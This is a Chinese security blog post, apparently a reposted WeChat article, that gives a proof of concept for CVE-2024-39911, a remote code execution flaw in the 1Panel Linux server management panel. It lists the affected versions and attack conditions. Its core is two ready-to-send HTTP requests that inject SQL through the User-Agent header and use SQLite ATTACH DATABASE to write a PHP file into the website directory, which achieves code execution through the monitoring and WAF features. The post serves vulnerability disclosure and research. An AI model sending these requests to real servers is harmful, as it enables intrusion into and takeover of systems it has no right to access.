CVE-2024-39911 POC及复现

admin 2024年7月21日23:24:36评论156 views字数 1432阅读4分46秒阅读模式

1Panel面板最新前台RCE漏洞(CVE-2024-39911)

1Panel 是新一代的 Linux 服务器运维管理面板,用户可以通过 Web 图形界面轻松管理 Linux 服务器,实现主机监控、文件管理、数据库管理、容器管理等功能。且深度集成开源建站软件 WordPress 和 Halo.

0x1 测试版本

专业版 v1.10.10-lts 社区版 v1.10.10-lts 1panel/openresty:1.21.4.3-3-1-focal

0x2 影响范围

网站监控功能影响 == 1panel/openresty:1.21.4.3-3-1-focal WAF功能影响 <= 1panel/openresty:1.21.4.3-3-1-focal

0x3 题外话

具体测试/发现过程在 https://blog.mo60.cn/index.php/archives/1Panel_SQLinjection2Rce.html 有兴趣的大佬们可以看看

0x4 网站监控功能GetShell

利用条件:

  • • 专业版,并开启网站监控功能

  • • 关闭waf功能

  • • 安装有1P-openresty容器且搭建有php环境网站

默认网站路径格式如下,这个路径是在op容器里面的路径

/www/sites/网站代号(默认为域名)/index/

通过sql注入导出文件到网站路径下

GET /HTTP/1.1
Host:192.168.99.6
User-Agent:ua','blog.mo60.cn',5201314,'','',1,'2024-06-09 08:16:52',1817921010.847,'/AAAAAAA',52014,'2025-06-09','16','','','Linux','edge','pc','','');ATTACHDATABASE'/www/sites/index/index/mo60.cn.php'AStest;createTABLEtest.exp(dataztext);insertINTOtest.exp(dataz)VALUES('<?=md5("blog.mo60.cn"); ?>');#

然后来到网站路径下可以看到我们写入的文件

CVE-2024-39911 POC及复现
image

访问发现成功输出blog.mo60.cn 的md5值,成功执行代码

CVE-2024-39911 POC及复现
image

0x5 Waf功能

利用条件:

  • • 开启waf功能

  • • 安装有1P-openresty容器且搭建有php环境网站

发送后即可成功写入文件

GET /.git/configHTTP/1.1
Host:192.168.99.6
User-Agent:blog.mo60.cn',"args","sqlInjectA","","YmxvZy5tbzYwLmNu","blog.mo60.cn",0,"deny",0,1);ATTACHDATABASE'/www/sites/index/index/mo60.cn.php'AStest;createTABLEtest.exp(dataztext);insertINTOtest.exp(dataz)VALUES('<?=md5("blog.mo60.cn");?>');#
Connection: close

漏洞来源

  • • https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-7m53-pwp6-v3f5

原文始发于微信公众号(HACK之道):CVE-2024-39911 POC及复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月21日23:24:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-39911 POC及复现https://cn-sec.com/archives/2981293.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息